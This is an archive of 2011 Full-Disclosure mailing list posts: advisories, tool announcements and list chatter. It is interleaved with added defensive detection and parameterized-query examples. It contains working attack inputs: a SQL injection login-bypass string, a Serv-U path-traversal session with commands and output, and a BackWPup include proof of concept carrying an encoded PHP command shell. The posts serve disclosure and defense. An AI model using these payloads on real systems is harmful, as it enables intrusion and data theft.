[Full-disclosure] mazur.harvard.edu database leak
Noticed this getting passed around twitter and decided to share in case you guys haven't seen it. http://blog.hacktalk.net/mazur-harvard-edu-database-leak/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New FREE security tool!
Hi,

I'm afraid all the download links in that webpage seem to be broken, except for the Windows installer (which has a different version number than the rest of the downloads). Also, the github repository where you're hosting the source code appears to be empty.

Cheers,
-Mario

On Wed, Nov 30, 2011 at 5:13 AM, nore...@exploitpack.com wrote:
> Exploit Pack is an open source security tool that will help you test the security of your computer or servers. It combines the benefits of a Java GUI, Python as engine and the latest exploits on the wild. It has an IDE to make the task of developing new exploits easier, Instant Search and XML-based modules.
>
> The latest release, version 1.1 is available for download right away! Take a look of the new features on this quick video: http://www.youtube.com/watch?v=DPX7JdvTRmg
>
> Download it directly from the main site: http://www.exploitpack.com
>
> We are looking for investors or donations to maintain this project alive!
>
> Thank you!
>
> The only one who has daily updates
> Exploit Pack

--
“There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
[Full-disclosure] Voxsmart VoxRecord Control Centre - Blind SQLi and auth. bypass
=== VoxRecord Control Centre - version 2.7 Blind SQLi and auth. bypass ===

Affected Software : Voxsmart - VoxRecord Control Centre v. 2.7
Severity : Critical
Local/Remote : Remote
Author: Piotr Duszynski @drk1wi

[Summary]

A blind sqli exists in /vcc/login.php login page. This can be used either for authentication bypass (admin privileges gained) or login:pass extraction from the 'voxsuser' database table.

[Vulnerability Details]

HTTP POST :/vcc/login.php

admin_un=adm[ BLIND SQL INJECTION]&admin_pw=adddm

- Authentication bypass: set admin_un to admin'%20or%201%3d1--

- Blind SQLi data extraction: 'voxsuser' table columns

+-------+----+----------+----------+-----------+----------+
| email | id | is_loged | password | user_type | username |
+-------+----+----------+----------+-----------+----------+

[Time-line]

1/10/2011 - Vendor notified
??? - Vendor response
??? - Vendor patch release
30/11/2011 - Public disclosure

Cheers,
@drk1wi
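Added example, not part of the advisory above and not Voxsmart's code: the login check below reproduces the query-building pattern that lets the advisory's admin_un value succeed, next to the parameterized form that rejects it. The SQLite database, its rows, the demo salt and all function names are constructed for illustration; only the table name, column names and the admin_un value come from the advisory.

```python
import hashlib
import sqlite3
from urllib.parse import unquote

# Constructed demo salt; a real deployment uses a per-user salt and a password KDF.
DEMO_SALT = b"constructed-demo-salt"

# The advisory's admin_un value, decoded from its URL-encoded form.
BYPASS_UN = unquote("admin'%20or%201%3d1--")


def hash_pw(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), DEMO_SALT, 100_000).hex()


def make_db():
    """In-memory stand-in for 'voxsuser' (subset of the listed columns, constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE voxsuser (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, user_type TEXT)"
    )
    db.executemany(
        "INSERT INTO voxsuser (username, password, user_type) VALUES (?, ?, ?)",
        [("admin", hash_pw("constructed-admin-pw"), "admin"),
         ("operator", hash_pw("constructed-op-pw"), "user")],
    )
    return db


def login_concatenated(db, admin_un, admin_pw):
    """Vulnerable pattern: request fields are pasted into the SQL text."""
    query = (
        "SELECT username, user_type FROM voxsuser "
        "WHERE username = '" + admin_un + "' "
        "AND password = '" + hash_pw(admin_pw) + "'"
    )
    # With BYPASS_UN the quote closes the literal, 'or 1=1' matches every row
    # and '--' comments out the password comparison.
    return db.execute(query).fetchone()


def login_parameterized(db, admin_un, admin_pw):
    """Hardened pattern: values travel as bound parameters, never as SQL text."""
    query = (
        "SELECT username, user_type FROM voxsuser "
        "WHERE username = ? AND password = ?"
    )
    return db.execute(query, (admin_un, hash_pw(admin_pw))).fetchone()


if __name__ == "__main__":
    db = make_db()
    for login in (login_concatenated, login_parameterized):
        print(login.__name__, "->", login(db, BYPASS_UN, "adddm"))
```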
[Full-disclosure] Serv-U Remote
I m better than TESO!
CONFIDENTIAL SOURCE MATERIALS!

[*][*]
Serv-U FTP Server Jail Break 0day
Discovered By Kingcope
Year 2011
[*][*]

Affected:
220 Serv-U FTP Server v7.3 ready...
220 Serv-U FTP Server v7.1 ready...
220 Serv-U FTP Server v6.4 ready...
220 Serv-U FTP Server v8.2 ready...
220 Serv-U FTP Server v10.5 ready...

[*][*]

C:\Users\kingcope\Desktop>ftp 192.168.133.134
Verbindung mit 192.168.133.134 wurde hergestellt.
220 Serv-U FTP Server v6.4 for WinSock ready...
Benutzer (192.168.133.134:(none)): ftp (anonymous user :)
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> cd /..:/..:/..:/..:/program files
250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files
ftp> ls -la
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
dr--r--r-- 1 user group 0 Nov 12 21:48 .
dr--r--r-- 1 user group 0 Nov 12 21:48 ..
drw-rw-rw- 1 user group 0 Feb 14 2011 Apache Software Foundation
drw-rw-rw- 1 user group 0 Feb 5 2011 ComPlus Applications
drw-rw-rw- 1 user group 0 Jul 11 01:06 Common Files
drw-rw-rw- 1 user group 0 Jul 8 16:57 CoreFTPServer
drw-rw-rw- 1 user group 0 Jul 11 01:06 IIS Resources
d- 1 user group 0 Jul 8 16:12 InstallShield Installation Information
drw-rw-rw- 1 user group 0 Jul 29 15:07 Internet Explorer
drw-rw-rw- 1 user group 0 Jul 8 16:12 Ipswitch
drw-rw-rw- 1 user group 0 Feb 12 2011 Java
drw-rw-rw- 1 user group 0 Jul 26 13:19 NetMeeting
drw-rw-rw- 1 user group 0 Jul 29 14:39 Outlook Express
drw-rw-rw- 1 user group 0 Jul 8 15:39 PostgreSQL
drw-rw-rw- 1 user group 0 Nov 12 21:48 RhinoSoft.com
drw-rw-rw- 1 user group 0 Feb 12 2011 Sun
d- 1 user group 0 Jul 29 15:13 Uninstall Information
drw-rw-rw- 1 user group 0 Feb 5 2011 VMware
drw-rw-rw- 1 user group 0 Jul 8 15:34 WinRAR
drw-rw-rw- 1 user group 0 Jul 26 13:30 Windows Media Player
drw-rw-rw- 1 user group 0 Feb 5 2011 Windows NT
d- 1 user group 0 Feb 5 2011 WindowsUpdate
226 Transfer complete.
FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s
ftp>

[*][*]
with write perms:

ftp> put foo.txt ..:/..:/..:/foobar -- writes foo into root of partition

[*][*]
and as anonymous ftp:

ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes
200 PORT Command successful.
150 Opening ASCII mode data connection for calc.exe (115712 Bytes).
226 Transfer complete.
FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s

[*][*]
This works too!!! :

220 Serv-U FTP Server v7.3 ready...
Benutzer (xx.xx.xx.xx:(none)): ftp
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> ls -a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
. .. AUTOEXEC.BAT boot.ini bootfont.bin bsmain_runtime.log CONFIG.SYS Documents and Settings FPSE_search Inetpub IO.SYS log MSDOS.SYS msizap.exe MSOCache mysql NTDETECT.COM ntldr Program Files RavBin RECYCLER Replay.log rising.ini System Volume Information TDDOWNLOAD WCH.CN WINDOWS wmpub
226 Transfer complete. 317 bytes transferred. 19.35 KB/sec.
FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s

[*][*]
Sometimes you need to give it the path:

ftp> ls -a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\
ftp> ls -a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
. .. 360 Adobe ASP.NET CCProxy CE Remote Tools cmak Common Files ComPlus Applications D-Tools FFTPServer HTML Help Workshop IISServer InstallShield Installation Information Intel Internet Explorer Java JavaSoft K-Lite Codec Pack Microsoft ActiveSync Microsoft Analysis Services Microsoft Device Emulator Microsoft MapPoint Web Service Samples Microsoft MapPoint Web Service SDK, Version 4.0 Microsoft Office Microsoft Office Servers Microsoft Silverlight Microsoft SQL Server Microsoft Visual SourceSafe Microsoft Visual Studio 8 Microsoft.NET MSBuild MSXML 6.0 NetMeeting Outlook Express PortMap1.61 Reference Assemblies Rising SQLXML 4.0 SQLyog Enterprise STS2Setup_2052 Symantec Thunder Network TSingVision Uninstall Information Windows Media Player
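Added example, not part of the post above: a detection pass over FTP command logs for the colon-decorated parent segments (`..:` and `:..`) that appear in the transcript, reporting how far each flagged path climbs. The log layout (date, time, client, user, command, argument), the sample lines and every name in the code are assumptions made for this example.

```python
import re
from typing import NamedTuple

# FTP commands whose argument is a path (a subset; extend for your server).
PATH_COMMANDS = {"CWD", "RETR", "STOR", "LIST", "NLST", "DELE", "MKD", "RMD", "SIZE"}
SEPARATORS = re.compile(r"[\\/]+")


class Finding(NamedTuple):
    line_no: int
    client: str
    command: str
    decorated: int   # segments such as '..:' or ':..' that reduce to '..'
    max_climb: int   # most levels reached above the starting directory


def inspect_path(arg):
    """Count colon-decorated parent segments and how far the path climbs."""
    depth = decorated = max_climb = 0
    for seg in SEPARATORS.split(arg):
        if seg in ("", "."):
            continue
        if seg.strip(": ") == "..":
            if seg != "..":
                decorated += 1          # a plain '..' is ordinary navigation
            depth -= 1
            max_climb = max(max_climb, -depth)
        else:
            depth += 1
    return decorated, max_climb


def scan(lines):
    """Return a Finding for every path command that carries a decorated '..'."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        fields = line.split(None, 5)    # date time client user command [argument]
        if len(fields) < 6 or fields[4].upper() not in PATH_COMMANDS:
            continue
        # Drop ls-style switches ("-a", "-la") that clients pass through LIST/NLST.
        tokens = fields[5].split(" ")
        while tokens and tokens[0].startswith("-"):
            tokens.pop(0)
        decorated, max_climb = inspect_path(" ".join(tokens))
        if decorated:
            findings.append(
                Finding(line_no, fields[2], fields[4].upper(), decorated, max_climb)
            )
    return findings


# Constructed log lines; the path arguments reuse forms shown in the transcript.
SAMPLE_LOG = [
    "2011-11-30 20:41:02 192.0.2.10 anonymous CWD /pub/docs",
    "2011-11-30 20:41:07 192.0.2.10 anonymous CWD /..:/..:/..:/..:/program files",
    "2011-11-30 20:41:09 192.0.2.10 anonymous STOR ..:/..:/..:/foobar",
    "2011-11-30 20:42:30 198.51.100.7 alice CWD ../images",
    r"2011-11-30 20:43:11 192.0.2.10 anonymous NLST -a ..:\:..\..:\..:\*",
    "2011-11-30 20:43:40 198.51.100.7 alice LIST -la",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```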
[Full-disclosure] Writing Self Modifying Code
Hello full disclosureites, a new tutorial is available at InfoSec Institute review from Andrew King on writing self modifying code. This is part one of a three part series: http://resources.infosecinstitute.com/writing-self-modifying-code-part-1/ In subsequent parts, Andrew will demonstrate how this can be used to bypass antivirus and other neat tricks. Your thoughts?
Re: [Full-disclosure] FreeBSD ftpd and ProFTPd on FreeBSD remote r00t exploit
Hello there!

The exploit roaringbeast will be added to Exploit pack
Authors name and code/license will be respected and it will be ported to Python with minimal modifications
The code will be uploaded to Exploit Pack Git Repo and will be available to all our users

Thank you and congratulations for such a great job!
JSacco

On 30.11.2011 13:32, HI-TECH . wrote:
> /* KCOPE2011 - x86/amd64 bsd ftpd remote root exploit
>  *
>  * KINGCOPE CONFIDENTIAL - SOURCE MATERIALS
>  *
>  * This is unpublished proprietary source code of KINGCOPE Security.
>  *
>  * (C) COPYRIGHT KINGCOPE Security, 2011
>  * All Rights Reserved
>  *
>  *
>  * bug found by Kingcope
>  * thanks to noone except alex whose damn down
>  *
>  * tested against: FreeBSD-8.2,8.1,7.2,7.1 i386;
>  *                 FreeBSD-6.3 i386
>  *                 FreeBSD-5.5,5.2 i386
>  *                 FreeBSD-8.2 amd64
>  *                 FreeBSD-7.3, 7.0 amd64
>  *                 FreeBSD-6.4, 6.2 amd64
>  *
>  */
>
> I m better than TESO 7350 see attached.
> I aint mad at cha and dont forget that the scene is fucked.
> and that the public scene is fucked too, kind of.
> youse a down ass bitch and I aint mad at cha.
>
> thanks lsd you are the only one NORMAL.
>
> hear the track before you see the code:
> http://www.youtube.com/watch?v=krxu9_dRUwQ
>
> BTW my box (isowarez.de) got hacked so expect me in a zine :
>
> /Signed the awesome Kingcope
[Full-disclosure] [SECURITY] [DSA 2355-1] clearsilver security update
Debian Security Advisory DSA-2355-1
secur...@debian.org
http://www.debian.org/security/
Moritz Muehlenhoff
November 30, 2011
http://www.debian.org/security/faq

Package        : clearsilver
Vulnerability  : format string vulnerability
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2011-4357

Leo Iannacone and Colin Watson discovered a format string vulnerability in the Python bindings for the Clearsilver HTML template system, which may lead to denial of service or the execution of arbitrary code.

For the oldstable distribution (lenny), this problem has been fixed in version 0.10.4-1.3+lenny1.

For the stable distribution (squeeze), this problem has been fixed in version 0.10.5-1+squeeze1.

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you upgrade your clearsilver packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
Re: [Full-disclosure] FreeBSD ftpd and ProFTPd on FreeBSD remote r00t exploit
Hi lists,

sorry if I offended anyone by referring to teso, I really like teso as you might also. all this happened because I was drunk hehe :

I hope you enjoy this release!

On 30 November 2011 20:32, HI-TECH . isowarez.isowarez.isowa...@googlemail.com wrote:
> /* KCOPE2011 - x86/amd64 bsd ftpd remote root exploit
>  *
>  * KINGCOPE CONFIDENTIAL - SOURCE MATERIALS
>  *
>  * This is unpublished proprietary source code of KINGCOPE Security.
>  *
>  * (C) COPYRIGHT KINGCOPE Security, 2011
>  * All Rights Reserved
>  *
>  *
>  * bug found by Kingcope
>  * thanks to noone except alex whose damn down
>  *
>  * tested against: FreeBSD-8.2,8.1,7.2,7.1 i386;
>  *                 FreeBSD-6.3 i386
>  *                 FreeBSD-5.5,5.2 i386
>  *                 FreeBSD-8.2 amd64
>  *                 FreeBSD-7.3, 7.0 amd64
>  *                 FreeBSD-6.4, 6.2 amd64
>  *
>  */
>
> I m better than TESO 7350 see attached.
> I aint mad at cha and dont forget that the scene is fucked.
> and that the public scene is fucked too, kind of.
> youse a down ass bitch and I aint mad at cha.
>
> thanks lsd you are the only one NORMAL.
>
> hear the track before you see the code:
> http://www.youtube.com/watch?v=krxu9_dRUwQ
>
> BTW my box (isowarez.de) got hacked so expect me in a zine :
>
> /Signed the awesome Kingcope
Re: [Full-disclosure] Writing Self Modifying Code
groundbreaking!

On Wed, Nov 30, 2011 at 11:30 PM, Adam Behnke a...@infosecinstitute.com wrote:
> Hello full disclosureites, a new tutorial is available at InfoSec Institute review from Andrew King on writing self modifying code. This is part one of a three part series:
>
> http://resources.infosecinstitute.com/writing-self-modifying-code-part-1/
>
> In subsequent parts, Andrew will demonstrate how this can be used to bypass antivirus and other neat tricks.
>
> Your thoughts?
Re: [Full-disclosure] FreeBSD ftpd and ProFTPd on FreeBSD remote r00t exploit
If you want to respect the license of this code you cannot include the exploit in your software. All rights reserved means you cannot include it in other products, actually nobody can except the author. You should ask the author for permission to redistribute the exploit or re-implement it.

On 11/30/2011 06:11 PM, nore...@exploitpack.com wrote:
> Hello there!
>
> The exploit roaringbeast will be added to Exploit pack
> Authors name and code/license will be respected and it will be ported to Python with minimal modifications
> The code will be uploaded to Exploit Pack Git Repo and will be available to all our users
>
> Thank you and congratulations for such a great job!
> JSacco
>
> On 30.11.2011 13:32, HI-TECH . wrote:
> > /* KCOPE2011 - x86/amd64 bsd ftpd remote root exploit
> >  *
> >  * KINGCOPE CONFIDENTIAL - SOURCE MATERIALS
> >  *
> >  * This is unpublished proprietary source code of KINGCOPE Security.
> >  *
> >  * (C) COPYRIGHT KINGCOPE Security, 2011
> >  * All Rights Reserved
> >  *
> >  *
> >  * bug found by Kingcope
> >  * thanks to noone except alex whose damn down
> >  *
> >  * tested against: FreeBSD-8.2,8.1,7.2,7.1 i386;
> >  *                 FreeBSD-6.3 i386
> >  *                 FreeBSD-5.5,5.2 i386
> >  *                 FreeBSD-8.2 amd64
> >  *                 FreeBSD-7.3, 7.0 amd64
> >  *                 FreeBSD-6.4, 6.2 amd64
> >  *
> >  */
> >
> > I m better than TESO 7350 see attached.
> > I aint mad at cha and dont forget that the scene is fucked.
> > and that the public scene is fucked too, kind of.
> > youse a down ass bitch and I aint mad at cha.
> >
> > thanks lsd you are the only one NORMAL.
> >
> > hear the track before you see the code:
> > http://www.youtube.com/watch?v=krxu9_dRUwQ
> >
> > BTW my box (isowarez.de) got hacked so expect me in a zine :
> >
> > /Signed the awesome Kingcope
[Full-disclosure] XSSer v1.6 -beta- aka Grey Swarm! released.
Hi list,

There is released a new version of *XSSer* (v1.6-beta-) - the cross site scripter framework.

Take a look to the XSSer website to see new features implemented, screenshots, documentation, etc...

http://xsser.sf.net

You can download original code directly from here:

http://sourceforge.net/projects/xsser/files/xsser_1.6-1.tar.gz/download

Or update your copy from the XSSer svn repository:

$ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser

Also, you have on the main website some pre-compiled packages (ArchLinux, Debian/Ubuntu, Gentoo, etc..)

Are you ready for the Grey Swarm!?

Happy cross hacking.

psy.
Re: [Full-disclosure] Wordpress plugin BackWPup Remote and Local Code Execution Vulnerability - SOS-11-003
On Mon, Mar 28, 2011 at 03:10:39PM +1100, Lists wrote:
> Sense of Security - Security Advisory - SOS-11-003
>
> Release Date. 28-Mar-2011
> Last Update. -
> Vendor Notification Date. 25-Mar-2010
> Product. Wordpress Plugin BackWPup
> Platform. Independent
> Affected versions. 1.6.1 (verified), possibly others
> Severity Rating. High
> Impact. System Access
> Attack Vector. Remote without authentication
> Solution Status. Upgrade to version 1.7.1
> CVE reference. Not yet assigned
>
> Details.
> A vulnerability has been discovered in the Wordpress plugin BackWPup 1.6.1 which can be exploited to execute local or remote code on the web server. The Input passed to the component wp_xml_export.php via the wpabs variable allows the inclusion and execution of local or remote PHP files as long as a _nonce value is known. The _nonce value relies on a static constant which is not defined in the script meaning that it defaults to the value 822728c8d9.
>
> Proof of Concept.
> wp_xml_export.php?_nonce=822728c8d9&wpabs=data://text/plain;base64,PGZ
> vcm0gYWN0aW9uPSI8Pz0kX1NFUlZFUlsnUkVRVUVTVF9VUkknXT8%2bIiBtZX
> Rob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ4Ij48aW5wdXQgdHlwZT0
> ic3VibWl0IiB2YWx1ZT0iY21kIj48L2Zvcm0%2bPHByZT48PyAKZWNobyBgeyRfUE9TVF
> sneCddfWA7ID8%2bPC9wcmU%2bPD8gZGllKCk7ID8%2bCgo%3d
>
> Solution.
> Upgrade to version 1.7.1
>
> Discovered by.
> Phil Taylor - Sense of Security Labs.
>
> Sense of Security Pty Ltd
> Level 8, 66 King St
> Sydney NSW 2000
> AUSTRALIA
> T: +61 (0)2 9290
> F: +61 (0)2 9290 4455
> W: http://www.senseofsecurity.com.au
> E: i...@senseofsecurity.com.au
> Twitter: @ITsecurityAU
>
> The latest version of this advisory can be found at:
> http://www.senseofsecurity.com.au/advisories/SOS-11-003.pdf
>
> Other Sense of Security advisories can be found at:
> http://www.senseofsecurity.com.au/research/it-security-advisories.php

http://osvdb.org/show/osvdb/71481
CVE-2011-4342

- Henri Salo
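Added example, not part of the advisory or the reply above: a check over web access logs for requests to wp_xml_export.php whose wpabs parameter carries a stream wrapper or a parent-directory segment instead of a local absolute path. The combined log format, the PLUGIN_DIR placeholder path, the sample lines and all names are assumptions made for this example; only the script name, the parameter names and the default _nonce value come from the advisory.

```python
import re
from urllib.parse import parse_qs, urlsplit

DEFAULT_NONCE = "822728c8d9"     # the fixed _nonce value quoted in the advisory
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# A scheme of two or more characters (data:, http:, php:, ftp: ...). A Windows
# drive letter such as C: is a single character and does not match.
WRAPPER = re.compile(r"^\s*([a-z][a-z0-9+.\-]+):", re.IGNORECASE)


def check_target(target):
    """Return the reasons a request target looks like abuse of the wpabs include."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp_xml_export.php"):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    for value in params.get("wpabs", []):
        match = WRAPPER.match(value)
        if match:
            reasons.append("wpabs-wrapper:" + match.group(1).lower())
        elif ".." in re.split(r"[\\/]+", value):
            reasons.append("wpabs-parent-dir")
    # The default nonce is the same on every install, so it is only context
    # for a request that is already suspicious, never a finding on its own.
    if reasons and DEFAULT_NONCE in params.get("_nonce", []):
        reasons.append("default-nonce")
    return reasons


def scan_access_log(lines):
    """Return (line number, client, reasons) for each suspicious request."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST.match(line)
        if not match:
            continue
        reasons = check_target(match.group(2))
        if reasons:
            hits.append((line_no, match.group(1), reasons))
    return hits


# Constructed sample lines; PLUGIN_DIR is a placeholder, not the plugin's real path.
SCRIPT = "/wp-content/plugins/PLUGIN_DIR/wp_xml_export.php"
SAMPLE_LOG = [
    f'192.0.2.20 - - [28/Mar/2011:10:02:11 +0000] "GET {SCRIPT}'
    f'?_nonce={DEFAULT_NONCE}&wpabs=%2Fvar%2Fwww%2Fhtml%2F HTTP/1.1" 200 5120',
    f'192.0.2.44 - - [28/Mar/2011:10:05:40 +0000] "GET {SCRIPT}'
    f'?_nonce={DEFAULT_NONCE}&wpabs=data://text/plain;base64,Q09OU1RSVUNURUQ%3d'
    ' HTTP/1.1" 200 312',
    f'198.51.100.9 - - [28/Mar/2011:10:07:02 +0000] "GET {SCRIPT}'
    '?_nonce=0a1b2c3d4e&wpabs=http://files.example/inc/ HTTP/1.1" 200 0',
    '192.0.2.20 - - [28/Mar/2011:10:09:15 +0000] "GET /index.php?p=12 HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```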
[Full-disclosure] Is FD no longer unmoderated?
A colleague of mine subscribed to FD recently and tried posting to it but every time he gets this message:

Is being held until the list moderator can review it for approval.
The reason it is being held:
Post to moderated list
Either the message will get posted to the list, or you will receive notification of the moderator's decision.

But the message neither gets posted, nor does he ever get the moderator's decision in a notification? What's the matter? Since when is this list moderated?
Re: [Full-disclosure] Is FD no longer unmoderated?
On Thu, 01 Dec 2011 07:49:28 +0530, David Blanc said:
> A colleague of mine subscribed to FD recently and tried posting to it but every time he gets this message:

n3td3v, is that your sock puppet? :)

The *list* isn't moderated. However, several *people* are, and they for the most part know who they are and why they're moderated.

(And no, I'm not one of the list moderators, nor do I have any real influence with those that are)
Re: [Full-disclosure] New FREE security tool!
Seems to have Juan Succo written all over it

On 11/30/11 1:49 AM, Mario Vilas wrote:
> Hi,
>
> I'm afraid all the download links in that webpage seem to be broken, except for the Windows installer (which has a different version number than the rest of the downloads). Also, the github repository where you're hosting the source code appears to be empty.
>
> Cheers,
> -Mario
>
> On Wed, Nov 30, 2011 at 5:13 AM, nore...@exploitpack.com wrote:
> > Exploit Pack is an open source security tool that will help you test the security of your computer or servers. It combines the benefits of a Java GUI, Python as engine and the latest exploits on the wild. It has an IDE to make the task of developing new exploits easier, Instant Search and XML-based modules.
> >
> > The latest release, version 1.1 is available for download right away! Take a look of the new features on this quick video: http://www.youtube.com/watch?v=DPX7JdvTRmg
> >
> > Download it directly from the main site: http://www.exploitpack.com
> >
> > We are looking for investors or donations to maintain this project alive!
> >
> > Thank you!
> >
> > The only one who has daily updates
> > Exploit Pack
>
> --
> “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
Re: [Full-disclosure] Is FD no longer unmoderated?
Hi,

On 01 December, David Blanc wrote:
> A colleague of mine subscribed to FD recently and tried posting to it but every time he gets this message:

Is he using a different mail address than that one he used to subscribe to FD?

Cheers,
Stefan

--
make -it ./work
GnuPG-Key: B96CF8D2 s...@tanis.toppoint.de
Fingerprint: D8AC D5E7 6865 19B1 385F 8850 2AB7 6A82 B96C F8D2